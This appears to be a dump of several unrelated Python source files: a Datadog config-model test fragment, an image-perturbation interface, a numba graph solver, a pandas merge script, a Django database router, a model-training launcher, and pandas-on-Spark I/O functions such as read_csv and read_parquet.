assert validators_contents == VALIDATORS_DOCUMENTATION
package_root_contents, package_root_errors = files['__init__.py']
assert not package_root_errors
assert package_root_contents == normalize_yaml(
"""
from .instance import InstanceConfig
class ConfigMixin:
_config_model_instance: InstanceConfig
@property
def config(self) -> InstanceConfig:
return self._config_model_instance
"""
)
defaults_contents, defaults_errors = files['defaults.py']
assert not defaults_errors
assert defaults_contents == normalize_yaml(
"""
from datadog_checks.base.utils.models.fields import get_default_field_value
def instance_default_precedence(field, value):
return 'baz'
def instance_example(field, value):
return 'bar'
def instance_example_ignored_array(field, value):
return get_default_field_value(field, value)
def instance_example_ignored_object(field, value):
return get_default_field_value(field, value)
def instance_long_default_formatted(field, value):
return [
['01', '02', '03', '04', '05'],
['06', '07', '08', '09', '10'],
['11', '12', '13', '14', '15'],
['16', '17', '18', '19', '20'],
['21', '22', '23', '24', '25'],
]
"""
)
instance_model_contents, instance_model_errors = files['instance.py']
assert not instance_model_errors
assert instance_model_contents == normalize_yaml(
"""
from __future__ import annotations
from typing import Any, Mapping, Optional, Sequence
from pydantic import BaseModel, root_validator, validator
from datadog_checks.base.utils.functions import identity
from datadog_checks.base.utils.models import validation
from . import defaults, validators
class InstanceConfig(BaseModel):
class Config:
allow_mutation = False
default_precedence: Optional[str]
example: Optional[str]
example_ignored_array: Optional[Sequence[str]]
example_ignored_object: Optional[Mapping[str, Any]]
foo: str
long_default_formatted: Optional[Sequence[Sequence[str]]]
@root_validator(pre=True)
def _initial_validation(cls, values):
return validation.core.initialize_config(getattr(validators, 'initialize_instance', identity)(values))
@validator('*', pre=True, always=True)
def _ensure_defaults(cls, v, field):
if v is not None or field.required:
return v
return getattr(defaults, f'instance_{field.name}')(field, v)
@validator('*')
def _run_validations(cls, v, field):
if not v:
return v
return getattr(validators, f'instance_{field.name}', identity)(v, field=field)
@root_validator(pre=False)
def _final_validation(cls, values):
return validation.core.finalize_config(getattr(validators, 'finalize_instance', identity)(values))
"""
)
|
py | 1a4b9ae61f7c19175e5ec4161f1bb6b1d3db7e25 | import abc
from typing import List, Tuple
import numpy as np
import PIL.Image
from smqtk_core import Plugfigurable
class PerturbImage (Plugfigurable):
"""
Interface abstracting the behavior of taking a reference image and
generating some number perturbations of the image along with paired mask
matrices indicating where perturbations have occurred and to what amount.
Implementations should impart no side effects upon the input image.
"""
@abc.abstractmethod
def perturb(
self,
ref_image: PIL.Image.Image
) -> Tuple[List[PIL.Image.Image], np.ndarray]:
"""
Transform an input reference image into a number of perturbed
variations along with mask matrices indicating the perturbed regions.
Output images should have the same shape as the input reference image,
including channels.
The output masks array should be of the shape `[nOutputs, H, W]`, where
`nOutputs` is the same number of output image perturbations, and `H`
and `W` are the pixel height and width of the input and output images.
Output mask matrices should be congruent in length to the number of
perturbed images output, as well as share the same height and width
dimensions.
These masks should indicate the regions in the corresponding perturbed
image that has been modified.
Values should be in the [0, 1] range, where a value closer to 1.0
indicate areas of the image that are *unperturbed*.
Note that output mask matrices *may be* of a floating-point type in
order to allow for fractional perturbation.
:param ref_image:
Reference image to generate perturbations from.
:return: Tuple of perturbed images and the masks detailing perturbation
areas.
"""
def __call__(
self,
ref_image: PIL.Image.Image
) -> Tuple[List[PIL.Image.Image], np.ndarray]:
"""
Alias for :meth:`.PerturbImage.perturb`.
"""
return self.perturb(ref_image)
|
py | 1a4b9b4ac893bd6347c977ae54d40fa7d8af0142 | import typing
import sys
import numpy as np
import numba as nb
@nb.njit
def sort_csgraph(
n: int,
g: np.ndarray,
) -> typing.Tuple[np.ndarray, np.ndarray, np.ndarray]:
sort_idx = np.argsort(g[:, 0], kind='mergesort')
g = g[sort_idx]
edge_idx = np.searchsorted(g[:, 0], np.arange(n + 1))
original_idx = np.arange(len(g))[sort_idx]
return g, edge_idx, original_idx
@nb.njit
def csgraph_to_undirected(g: np.ndarray) -> np.ndarray:
m = len(g)
g = np.vstack((g, g))
g[m:, :2] = g[m:, 1::-1]
return g
@nb.njit((nb.i8, nb.i8[:, :]), cache=True)
def connected_components_bfs(n: int, g: np.ndarray):
g = csgraph_to_undirected(g)
g, edge_idx, _ = sort_csgraph(n, g)
label = np.full(n, -1, np.int64)
l = 0
for i in range(n):
if label[i] != -1: continue
label[i] = l
que = [i]
for u in que:
for v in g[edge_idx[u]:edge_idx[u + 1], 1]:
if label[v] != -1: continue
label[v] = l
que.append(v)
l += 1
return label
@nb.njit((nb.i8[:], ), cache=True)
def solve(a: np.ndarray) -> typing.NoReturn:
n = a.size
a = np.searchsorted(np.unique(a), a)
m = a.max() + 1
g = np.empty((n, 2), np.int64)
idx_to_add = 0
def add_edge(u, v):
nonlocal idx_to_add
g[idx_to_add] = (u, v)
idx_to_add += 1
for i in range(n // 2):
x, y = a[i], a[n - 1 - i]
add_edge(x, y)
add_edge(y, x)
g = g[:idx_to_add]
label = connected_components_bfs(m, g)
print(m - label.max() - 1)
def main() -> typing.NoReturn:
n = int(input())
a = np.array(
sys.stdin.readline().split(),
dtype=np.int64,
)
solve(a)
main() |
py | 1a4b9b919e1c22bf2de6b661614af3d21326e947 | #!/usr/bin/env python3
import argparse
import os
import sys
import numpy as np
from functools import reduce
from collections import OrderedDict
import pandas as pd
## merge filtered/summarized files with qsim values by user-specified comparison
def getOptions():
parser = argparse.ArgumentParser(description='Merges together filtered/summarized comparate count tables by user-specified comparison')
parser.add_argument("-output", "--output", dest="output", action="store", required=True, help="Output directory for complete merged comparate files ready for Bayesian")
parser.add_argument("-comp", "--comp", dest="comp", action='store', required=True, help="Input filtered/summarized count tables per one comparate")
parser.add_argument("-design", "--design", dest="design", action='store', required=True, help="Design file")
args=parser.parse_args()
return(args)
def main():
args = getOptions()
### Read in design file as dataframe
df_design = pd.read_csv(args.design)
### Create subset of design file of comparate specification columns (will quantify # comparates by number of columns left)
### Store compID to name output file
c1_g1_list = df_design['C1_G1'].tolist()
c1_g2_list = df_design['C1_G2'].tolist()
c2_g1_list = df_design['C2_G1'].tolist()
c2_g2_list = df_design['C2_G2'].tolist()
c1_list = df_design['Comparate_1'].tolist()
c2_list = df_design['Comparate_2'].tolist()
del df_design['C1_G1']
del df_design['C1_G2']
del df_design['C2_G1']
del df_design['C2_G2']
dict = {}
col_list = list(df_design.columns.values)
row_list = []
comparison_list = df_design['compID'].tolist()
del df_design['compID']
### Create dictionaries per design file row to store the row's comparate files
for index, sample in df_design.iterrows():
dict[index] = list(sample)
## If there are comparison columns (column # > 1)
for key in dict:
row_list = dict[key]
file_list = []
comp_dict = {}
comparison = comparison_list[key]
c1_g1= c1_g1_list[key]
c1_g2= c1_g2_list[key]
c2_g1= c2_g1_list[key]
c2_g2= c2_g2_list[key]
c1= c1_list[key]
c2= c2_list[key]
for i, comp in enumerate(row_list):
comp_dict[i+1] = comp
### Assign filename so it can be called
row_list[i] = args.comp + '/bayesian_input_' + comp + '.csv'
file = pd.read_csv(row_list[i], index_col=None, header =0)
file_list.append(file)
df_merged = reduce(lambda x, y: pd.merge(x, y, on = ['FEATURE_ID']), file_list)
### drop columns you don't want before merge
df_merged = df_merged[df_merged.columns.drop(list(df_merged.filter(regex='comp')))]
df_merged.set_index('FEATURE_ID', inplace=True)
## AMM fixing below line get_values is deprecated
## merged_headers = list(df_merged.columns.get_values())
merged_headers = list(df_merged.columns.to_numpy())
### For stan model, requires headers to have general comparate input names
### This reassigns comparate names to be c1, c2, c3... depending on design file specifications
for x in comp_dict:
for i in range(len(merged_headers)):
if c1 in merged_headers[i]:
merged_headers[i] = merged_headers[i].replace(c1, 'c1')
if c2 in merged_headers[i]:
merged_headers[i] = merged_headers[i].replace(c2, 'c2')
df_merged.columns=merged_headers
df_filtered = df_merged
outfile = args.output + '/bayesian_input_' + comparison + '.csv'
df_filtered.to_csv(outfile)
if __name__=='__main__':
main()
|
py | 1a4ba152976199170d56acb417db2a69860562ab | import torch
print('Creating tensor...')
t = torch.ones(10).cuda()
print(t)
|
py | 1a4ba37dc62bd0a0abdf068b7b3c8abe03570890 | from django.conf import settings
IS_TEST = False
TEST_FLAG = '__TEST'
class DbRouterMiddleware(object):
def process_request( self, request):
global IS_TEST
IS_TEST = request.GET.get(TEST_FLAG)
return None
def process_response( self, request, response ):
global IS_TEST
IS_TEST = False
return response
class DatabaseRouter (object):
# def db_for_read( self, model, **hints ):
# return 'test' if IS_TEST else 'default';
#
# def db_for_write( self, model, **hints ):
# return 'test' if IS_TEST else 'default';
#
# def allow_relation( self, obj1, obj2, **hints ):
# return True
#
# def allow_migrate( self, db, app_label, model_name=None, **hints ):
# return True
def db_for_read(self, model, **hints):
""""Point all read operations to the specific database."""
if model._meta.app_label in settings.DATABASE_APPS_MAPPING:
return settings.DATABASE_APPS_MAPPING[model._meta.app_label]
return 'test' if IS_TEST else 'default';
def db_for_write(self, model, **hints):
"""Point all write operations to the specific database."""
if model._meta.app_label in settings.DATABASE_APPS_MAPPING:
return settings.DATABASE_APPS_MAPPING[model._meta.app_label]
return 'test' if IS_TEST else 'default';
def allow_relation(self, obj1, obj2, **hints):
"""Allow any relation between apps that use the same database."""
db_obj1 = settings.DATABASE_APPS_MAPPING.get(obj1._meta.app_label)
db_obj2 = settings.DATABASE_APPS_MAPPING.get(obj2._meta.app_label)
if db_obj1 and db_obj2:
if db_obj1 == db_obj2:
return True
else:
return False
return True
def allow_migrate(self, db, model):
"""Make sure that apps only appear in the related database."""
""" No migrate all database no_sql and model have ap_label = no_sql"""
if db == 'no_sql' or model._meta.app_label == "no_sql":
return False
else:
return True
|
py | 1a4ba41fc1245728fd3d5c74916fd5dae741e46d | import os
from BEA.demo.preprocess import preprocess, output_folder
if __name__ == "__main__":
train = True
# 1. 修改nnUNet path文件中的路径
# 2. 修改preprocess 文件中的路径
preprocess() # only run one time
# Training
# Also cd BEA_package/BEA/run
# Run nohup python run_training.py -gpu='0' -outpath='BEA' -task 026 2>&1 & for training.
if train:
os.system('/home/wyh/anaconda3/envs/BSG/bin/python -u /homeb/wyh/Codes/BEA-Net/BEA_package/BEA/run/run_training.py'
' -gpu=\'0\' -outpath=\'BEA\' -task 026')
# Testing
# Also cd BEA_package/BEA/run
# Run nohup python run_training.py -gpu='0' -outpath='BEA' -task 026 -val 2>&1 & for training.
else:
os.system(
'/home/wyh/anaconda3/envs/BSG/bin/python -u /homeb/wyh/Codes/BEA-Net/BEA_package/BEA/run/run_training.py'
' -gpu=\'0\' -outpath=\'BEA\' -task 026 -val')
|
py | 1a4ba49514ab0f068863e5cba42aee6f3fc63b03 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Wrappers around spark that correspond to common pandas functions.
"""
from typing import Any, Optional, Union, List, Tuple, Sized, cast
from collections import OrderedDict
from collections.abc import Iterable
from distutils.version import LooseVersion
from functools import reduce
from io import BytesIO
import json
import numpy as np
import pandas as pd
from pandas.api.types import is_datetime64_dtype, is_datetime64tz_dtype, is_list_like
import pyarrow as pa
import pyarrow.parquet as pq
import pyspark
from pyspark import sql as spark
from pyspark.sql import functions as F
from pyspark.sql.functions import pandas_udf, PandasUDFType
from pyspark.sql.types import (
ByteType,
ShortType,
IntegerType,
LongType,
FloatType,
DoubleType,
BooleanType,
TimestampType,
DecimalType,
StringType,
DateType,
StructType,
)
from pyspark import pandas as pp # noqa: F401
from pyspark.pandas.base import IndexOpsMixin
from pyspark.pandas.utils import (
align_diff_frames,
default_session,
is_name_like_tuple,
name_like_string,
same_anchor,
scol_for,
validate_axis,
)
from pyspark.pandas.frame import DataFrame, _reduce_spark_multi
from pyspark.pandas.internal import (
InternalFrame,
DEFAULT_SERIES_NAME,
HIDDEN_COLUMNS,
)
from pyspark.pandas.series import Series, first_series
from pyspark.pandas.spark.utils import as_nullable_spark_type, force_decimal_precision_scale
from pyspark.pandas.indexes import Index, DatetimeIndex
__all__ = [
"from_pandas",
"range",
"read_csv",
"read_delta",
"read_table",
"read_spark_io",
"read_parquet",
"read_clipboard",
"read_excel",
"read_html",
"to_datetime",
"date_range",
"get_dummies",
"concat",
"melt",
"isna",
"isnull",
"notna",
"notnull",
"read_sql_table",
"read_sql_query",
"read_sql",
"read_json",
"merge",
"to_numeric",
"broadcast",
"read_orc",
]
def from_pandas(pobj: Union[pd.DataFrame, pd.Series, pd.Index]) -> Union[Series, DataFrame, Index]:
"""Create a Koalas DataFrame, Series or Index from a pandas DataFrame, Series or Index.
This is similar to Spark's `SparkSession.createDataFrame()` with pandas DataFrame,
but this also works with pandas Series and picks the index.
Parameters
----------
pobj : pandas.DataFrame or pandas.Series
pandas DataFrame or Series to read.
Returns
-------
Series or DataFrame
If a pandas Series is passed in, this function returns a Koalas Series.
If a pandas DataFrame is passed in, this function returns a Koalas DataFrame.
"""
if isinstance(pobj, pd.Series):
return Series(pobj)
elif isinstance(pobj, pd.DataFrame):
return DataFrame(pobj)
elif isinstance(pobj, pd.Index):
return DataFrame(pd.DataFrame(index=pobj)).index
else:
raise ValueError("Unknown data type: {}".format(type(pobj).__name__))
_range = range # built-in range
def range(
start: int, end: Optional[int] = None, step: int = 1, num_partitions: Optional[int] = None
) -> DataFrame:
"""
Create a DataFrame with some range of numbers.
The resulting DataFrame has a single int64 column named `id`, containing elements in a range
from ``start`` to ``end`` (exclusive) with step value ``step``. If only the first parameter
(i.e. start) is specified, we treat it as the end value with the start value being 0.
This is similar to the range function in SparkSession and is used primarily for testing.
Parameters
----------
start : int
the start value (inclusive)
end : int, optional
the end value (exclusive)
step : int, optional, default 1
the incremental step
num_partitions : int, optional
the number of partitions of the DataFrame
Returns
-------
DataFrame
Examples
--------
When the first parameter is specified, we generate a range of values up till that number.
>>> pp.range(5)
id
0 0
1 1
2 2
3 3
4 4
When start, end, and step are specified:
>>> pp.range(start = 100, end = 200, step = 20)
id
0 100
1 120
2 140
3 160
4 180
"""
sdf = default_session().range(start=start, end=end, step=step, numPartitions=num_partitions)
return DataFrame(sdf)
def read_csv(
path,
sep=",",
header="infer",
names=None,
index_col=None,
usecols=None,
squeeze=False,
mangle_dupe_cols=True,
dtype=None,
nrows=None,
parse_dates=False,
quotechar=None,
escapechar=None,
comment=None,
**options
) -> Union[DataFrame, Series]:
"""Read CSV (comma-separated) file into DataFrame or Series.
Parameters
----------
path : str
The path string storing the CSV file to be read.
sep : str, default ‘,’
Delimiter to use. Must be a single character.
header : int, list of int, default ‘infer’
Whether to to use as the column names, and the start of the data.
Default behavior is to infer the column names: if no names are passed
the behavior is identical to `header=0` and column names are inferred from
the first line of the file, if column names are passed explicitly then
the behavior is identical to `header=None`. Explicitly pass `header=0` to be
able to replace existing names
names : str or array-like, optional
List of column names to use. If file contains no header row, then you should
explicitly pass `header=None`. Duplicates in this list will cause an error to be issued.
If a string is given, it should be a DDL-formatted string in Spark SQL, which is
preferred to avoid schema inference for better performance.
index_col: str or list of str, optional, default: None
Index column of table in Spark.
usecols : list-like or callable, optional
Return a subset of the columns. If list-like, all elements must either be
positional (i.e. integer indices into the document columns) or strings that
correspond to column names provided either by the user in names or inferred
from the document header row(s).
If callable, the callable function will be evaluated against the column names,
returning names where the callable function evaluates to `True`.
squeeze : bool, default False
If the parsed data only contains one column then return a Series.
mangle_dupe_cols : bool, default True
Duplicate columns will be specified as 'X0', 'X1', ... 'XN', rather
than 'X' ... 'X'. Passing in False will cause data to be overwritten if
there are duplicate names in the columns.
Currently only `True` is allowed.
dtype : Type name or dict of column -> type, default None
Data type for data or columns. E.g. {‘a’: np.float64, ‘b’: np.int32} Use str or object
together with suitable na_values settings to preserve and not interpret dtype.
nrows : int, default None
Number of rows to read from the CSV file.
parse_dates : boolean or list of ints or names or list of lists or dict, default `False`.
Currently only `False` is allowed.
quotechar : str (length 1), optional
The character used to denote the start and end of a quoted item. Quoted items can include
the delimiter and it will be ignored.
escapechar : str (length 1), default None
One-character string used to escape delimiter
comment: str, optional
Indicates the line should not be parsed.
options : dict
All other options passed directly into Spark's data source.
Returns
-------
DataFrame or Series
See Also
--------
DataFrame.to_csv : Write DataFrame to a comma-separated values (csv) file.
Examples
--------
>>> pp.read_csv('data.csv') # doctest: +SKIP
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
if mangle_dupe_cols is not True:
raise ValueError("mangle_dupe_cols can only be `True`: %s" % mangle_dupe_cols)
if parse_dates is not False:
raise ValueError("parse_dates can only be `False`: %s" % parse_dates)
if usecols is not None and not callable(usecols):
usecols = list(usecols)
if usecols is None or callable(usecols) or len(usecols) > 0:
reader = default_session().read
reader.option("inferSchema", True)
reader.option("sep", sep)
if header == "infer":
header = 0 if names is None else None
if header == 0:
reader.option("header", True)
elif header is None:
reader.option("header", False)
else:
raise ValueError("Unknown header argument {}".format(header))
if quotechar is not None:
reader.option("quote", quotechar)
if escapechar is not None:
reader.option("escape", escapechar)
if comment is not None:
if not isinstance(comment, str) or len(comment) != 1:
raise ValueError("Only length-1 comment characters supported")
reader.option("comment", comment)
reader.options(**options)
if isinstance(names, str):
sdf = reader.schema(names).csv(path)
column_labels = OrderedDict((col, col) for col in sdf.columns)
else:
sdf = reader.csv(path)
if is_list_like(names):
names = list(names)
if len(set(names)) != len(names):
raise ValueError("Found non-unique column index")
if len(names) != len(sdf.columns):
raise ValueError(
"The number of names [%s] does not match the number "
"of columns [%d]. Try names by a Spark SQL DDL-formatted "
"string." % (len(sdf.schema), len(names))
)
column_labels = OrderedDict(zip(names, sdf.columns))
elif header is None:
column_labels = OrderedDict(enumerate(sdf.columns))
else:
column_labels = OrderedDict((col, col) for col in sdf.columns)
if usecols is not None:
if callable(usecols):
column_labels = OrderedDict(
(label, col) for label, col in column_labels.items() if usecols(label)
)
missing = []
elif all(isinstance(col, int) for col in usecols):
new_column_labels = OrderedDict(
(label, col)
for i, (label, col) in enumerate(column_labels.items())
if i in usecols
)
missing = [
col
for col in usecols
if col >= len(column_labels)
or list(column_labels)[col] not in new_column_labels
]
column_labels = new_column_labels
elif all(isinstance(col, str) for col in usecols):
new_column_labels = OrderedDict(
(label, col) for label, col in column_labels.items() if label in usecols
)
missing = [col for col in usecols if col not in new_column_labels]
column_labels = new_column_labels
else:
raise ValueError(
"'usecols' must either be list-like of all strings, "
"all unicode, all integers or a callable."
)
if len(missing) > 0:
raise ValueError(
"Usecols do not match columns, columns expected but not " "found: %s" % missing
)
if len(column_labels) > 0:
sdf = sdf.select([scol_for(sdf, col) for col in column_labels.values()])
else:
sdf = default_session().createDataFrame([], schema=StructType())
else:
sdf = default_session().createDataFrame([], schema=StructType())
column_labels = OrderedDict()
if nrows is not None:
sdf = sdf.limit(nrows)
if index_col is not None:
if isinstance(index_col, (str, int)):
index_col = [index_col]
for col in index_col:
if col not in column_labels:
raise KeyError(col)
index_spark_column_names = [column_labels[col] for col in index_col]
index_names = [(col,) for col in index_col] # type: List[Tuple]
column_labels = OrderedDict(
(label, col) for label, col in column_labels.items() if label not in index_col
)
else:
index_spark_column_names = []
index_names = []
kdf = DataFrame(
InternalFrame(
spark_frame=sdf,
index_spark_columns=[scol_for(sdf, col) for col in index_spark_column_names],
index_names=index_names,
column_labels=[
label if is_name_like_tuple(label) else (label,) for label in column_labels
],
data_spark_columns=[scol_for(sdf, col) for col in column_labels.values()],
)
) # type: DataFrame
if dtype is not None:
if isinstance(dtype, dict):
for col, tpe in dtype.items():
kdf[col] = kdf[col].astype(tpe)
else:
for col in kdf.columns:
kdf[col] = kdf[col].astype(dtype)
if squeeze and len(kdf.columns) == 1:
return first_series(kdf)
else:
return kdf
def read_json(
path: str, lines: bool = True, index_col: Optional[Union[str, List[str]]] = None, **options
) -> DataFrame:
"""
Convert a JSON string to DataFrame.
Parameters
----------
path : string
File path
lines : bool, default True
Read the file as a json object per line. It should be always True for now.
index_col : str or list of str, optional, default: None
Index column of table in Spark.
options : dict
All other options passed directly into Spark's data source.
Examples
--------
>>> df = pp.DataFrame([['a', 'b'], ['c', 'd']],
... columns=['col 1', 'col 2'])
>>> df.to_json(path=r'%s/read_json/foo.json' % path, num_files=1)
>>> pp.read_json(
... path=r'%s/read_json/foo.json' % path
... ).sort_values(by="col 1")
col 1 col 2
0 a b
1 c d
>>> df.to_json(path=r'%s/read_json/foo.json' % path, num_files=1, lineSep='___')
>>> pp.read_json(
... path=r'%s/read_json/foo.json' % path, lineSep='___'
... ).sort_values(by="col 1")
col 1 col 2
0 a b
1 c d
You can preserve the index in the roundtrip as below.
>>> df.to_json(path=r'%s/read_json/bar.json' % path, num_files=1, index_col="index")
>>> pp.read_json(
... path=r'%s/read_json/bar.json' % path, index_col="index"
... ).sort_values(by="col 1") # doctest: +NORMALIZE_WHITESPACE
col 1 col 2
index
0 a b
1 c d
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
if not lines:
raise NotImplementedError("lines=False is not implemented yet.")
return read_spark_io(path, format="json", index_col=index_col, **options)
def read_delta(
path: str,
version: Optional[str] = None,
timestamp: Optional[str] = None,
index_col: Optional[Union[str, List[str]]] = None,
**options
) -> DataFrame:
"""
Read a Delta Lake table on some file system and return a DataFrame.
If the Delta Lake table is already stored in the catalog (aka the metastore), use 'read_table'.
Parameters
----------
path : string
Path to the Delta Lake table.
version : string, optional
Specifies the table version (based on Delta's internal transaction version) to read from,
using Delta's time travel feature. This sets Delta's 'versionAsOf' option.
timestamp : string, optional
Specifies the table version (based on timestamp) to read from,
using Delta's time travel feature. This must be a valid date or timestamp string in Spark,
and sets Delta's 'timestampAsOf' option.
index_col : str or list of str, optional, default: None
Index column of table in Spark.
options
Additional options that can be passed onto Delta.
Returns
-------
DataFrame
See Also
--------
DataFrame.to_delta
read_table
read_spark_io
read_parquet
Examples
--------
>>> pp.range(1).to_delta('%s/read_delta/foo' % path) # doctest: +SKIP
>>> pp.read_delta('%s/read_delta/foo' % path) # doctest: +SKIP
id
0 0
>>> pp.range(10, 15, num_partitions=1).to_delta('%s/read_delta/foo' % path,
... mode='overwrite') # doctest: +SKIP
>>> pp.read_delta('%s/read_delta/foo' % path) # doctest: +SKIP
id
0 10
1 11
2 12
3 13
4 14
>>> pp.read_delta('%s/read_delta/foo' % path, version=0) # doctest: +SKIP
id
0 0
You can preserve the index in the roundtrip as below.
>>> pp.range(10, 15, num_partitions=1).to_delta(
... '%s/read_delta/bar' % path, index_col="index") # doctest: +SKIP
>>> pp.read_delta('%s/read_delta/bar' % path, index_col="index") # doctest: +SKIP
id
index
0 10
1 11
2 12
3 13
4 14
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
if version is not None:
options["versionAsOf"] = version
if timestamp is not None:
options["timestampAsOf"] = timestamp
return read_spark_io(path, format="delta", index_col=index_col, **options)
def read_table(name: str, index_col: Optional[Union[str, List[str]]] = None) -> DataFrame:
"""
Read a Spark table and return a DataFrame.
Parameters
----------
name : string
Table name in Spark.
index_col : str or list of str, optional, default: None
Index column of table in Spark.
Returns
-------
DataFrame
See Also
--------
DataFrame.to_table
read_delta
read_parquet
read_spark_io
Examples
--------
>>> pp.range(1).to_table('%s.my_table' % db)
>>> pp.read_table('%s.my_table' % db)
id
0 0
>>> pp.range(1).to_table('%s.my_table' % db, index_col="index")
>>> pp.read_table('%s.my_table' % db, index_col="index") # doctest: +NORMALIZE_WHITESPACE
id
index
0 0
"""
sdf = default_session().read.table(name)
index_spark_columns, index_names = _get_index_map(sdf, index_col)
return DataFrame(
InternalFrame(
spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names
)
)
def read_spark_io(
path: Optional[str] = None,
format: Optional[str] = None,
schema: Union[str, "StructType"] = None,
index_col: Optional[Union[str, List[str]]] = None,
**options
) -> DataFrame:
"""Load a DataFrame from a Spark data source.
Parameters
----------
path : string, optional
Path to the data source.
format : string, optional
Specifies the output data source format. Some common ones are:
- 'delta'
- 'parquet'
- 'orc'
- 'json'
- 'csv'
schema : string or StructType, optional
Input schema. If none, Spark tries to infer the schema automatically.
The schema can either be a Spark StructType, or a DDL-formatted string like
`col0 INT, col1 DOUBLE`.
index_col : str or list of str, optional, default: None
Index column of table in Spark.
options : dict
All other options passed directly into Spark's data source.
See Also
--------
DataFrame.to_spark_io
DataFrame.read_table
DataFrame.read_delta
DataFrame.read_parquet
Examples
--------
>>> pp.range(1).to_spark_io('%s/read_spark_io/data.parquet' % path)
>>> pp.read_spark_io(
... '%s/read_spark_io/data.parquet' % path, format='parquet', schema='id long')
id
0 0
>>> pp.range(10, 15, num_partitions=1).to_spark_io('%s/read_spark_io/data.json' % path,
... format='json', lineSep='__')
>>> pp.read_spark_io(
... '%s/read_spark_io/data.json' % path, format='json', schema='id long', lineSep='__')
id
0 10
1 11
2 12
3 13
4 14
You can preserve the index in the roundtrip as below.
>>> pp.range(10, 15, num_partitions=1).to_spark_io('%s/read_spark_io/data.orc' % path,
... format='orc', index_col="index")
>>> pp.read_spark_io(
... path=r'%s/read_spark_io/data.orc' % path, format="orc", index_col="index")
... # doctest: +NORMALIZE_WHITESPACE
id
index
0 10
1 11
2 12
3 13
4 14
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
sdf = default_session().read.load(path=path, format=format, schema=schema, **options)
index_spark_columns, index_names = _get_index_map(sdf, index_col)
return DataFrame(
InternalFrame(
spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names
)
)
def read_parquet(path, columns=None, index_col=None, pandas_metadata=False, **options) -> DataFrame:
"""Load a parquet object from the file path, returning a DataFrame.
Parameters
----------
path : string
File path
columns : list, default=None
If not None, only these columns will be read from the file.
index_col : str or list of str, optional, default: None
Index column of table in Spark.
pandas_metadata : bool, default: False
If True, try to respect the metadata if the Parquet file is written from pandas.
options : dict
All other options passed directly into Spark's data source.
Returns
-------
DataFrame
See Also
--------
DataFrame.to_parquet
DataFrame.read_table
DataFrame.read_delta
DataFrame.read_spark_io
Examples
--------
>>> pp.range(1).to_parquet('%s/read_spark_io/data.parquet' % path)
>>> pp.read_parquet('%s/read_spark_io/data.parquet' % path, columns=['id'])
id
0 0
You can preserve the index in the roundtrip as below.
>>> pp.range(1).to_parquet('%s/read_spark_io/data.parquet' % path, index_col="index")
>>> pp.read_parquet('%s/read_spark_io/data.parquet' % path, columns=['id'], index_col="index")
... # doctest: +NORMALIZE_WHITESPACE
id
index
0 0
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
if columns is not None:
columns = list(columns)
index_names = None
if index_col is None and pandas_metadata:
if LooseVersion(pyspark.__version__) < LooseVersion("3.0.0"):
raise ValueError("pandas_metadata is not supported with Spark < 3.0.")
# Try to read pandas metadata
@pandas_udf("index_col array<string>, index_names array<string>", PandasUDFType.SCALAR)
def read_index_metadata(pser):
binary = pser.iloc[0]
metadata = pq.ParquetFile(pa.BufferReader(binary)).metadata.metadata
if b"pandas" in metadata:
pandas_metadata = json.loads(metadata[b"pandas"].decode("utf8"))
if all(isinstance(col, str) for col in pandas_metadata["index_columns"]):
index_col = []
index_names = []
for col in pandas_metadata["index_columns"]:
index_col.append(col)
for column in pandas_metadata["columns"]:
if column["field_name"] == col:
index_names.append(column["name"])
break
else:
index_names.append(None)
return pd.DataFrame({"index_col": [index_col], "index_names": [index_names]})
return pd.DataFrame({"index_col": [None], "index_names": [None]})
index_col, index_names = (
default_session()
.read.format("binaryFile")
.load(path)
.limit(1)
.select(read_index_metadata("content").alias("index_metadata"))
.select("index_metadata.*")
.head()
)
kdf = read_spark_io(path=path, format="parquet", options=options, index_col=index_col)
if columns is not None:
new_columns = [c for c in columns if c in kdf.columns]
if len(new_columns) > 0:
kdf = kdf[new_columns]
else:
sdf = default_session().createDataFrame([], schema=StructType())
index_spark_columns, index_names = _get_index_map(sdf, index_col)
kdf = DataFrame(
InternalFrame(
spark_frame=sdf,
index_spark_columns=index_spark_columns,
index_names=index_names,
)
)
if index_names is not None:
kdf.index.names = index_names
return kdf
def read_clipboard(sep=r"\s+", **kwargs) -> DataFrame:
r"""
Read text from clipboard and pass to read_csv. See read_csv for the
full argument list
Parameters
----------
sep : str, default '\s+'
A string or regex delimiter. The default of '\s+' denotes
one or more whitespace characters.
See Also
--------
DataFrame.to_clipboard : Write text out to clipboard.
Returns
-------
parsed : DataFrame
"""
return cast(DataFrame, from_pandas(pd.read_clipboard(sep, **kwargs)))
def read_excel(
io,
sheet_name=0,
header=0,
names=None,
index_col=None,
usecols=None,
squeeze=False,
dtype=None,
engine=None,
converters=None,
true_values=None,
false_values=None,
skiprows=None,
nrows=None,
na_values=None,
keep_default_na=True,
verbose=False,
parse_dates=False,
date_parser=None,
thousands=None,
comment=None,
skipfooter=0,
convert_float=True,
mangle_dupe_cols=True,
**kwds
) -> Union[DataFrame, Series, OrderedDict]:
"""
Read an Excel file into a Koalas DataFrame or Series.
Support both `xls` and `xlsx` file extensions from a local filesystem or URL.
Support an option to read a single sheet or a list of sheets.
Parameters
----------
io : str, file descriptor, pathlib.Path, ExcelFile or xlrd.Book
The string could be a URL. The value URL must be available in Spark's DataFrameReader.
.. note::
If the underlying Spark is below 3.0, the parameter as a string is not supported.
You can use `pp.from_pandas(pd.read_excel(...))` as a workaround.
sheet_name : str, int, list, or None, default 0
Strings are used for sheet names. Integers are used in zero-indexed
sheet positions. Lists of strings/integers are used to request
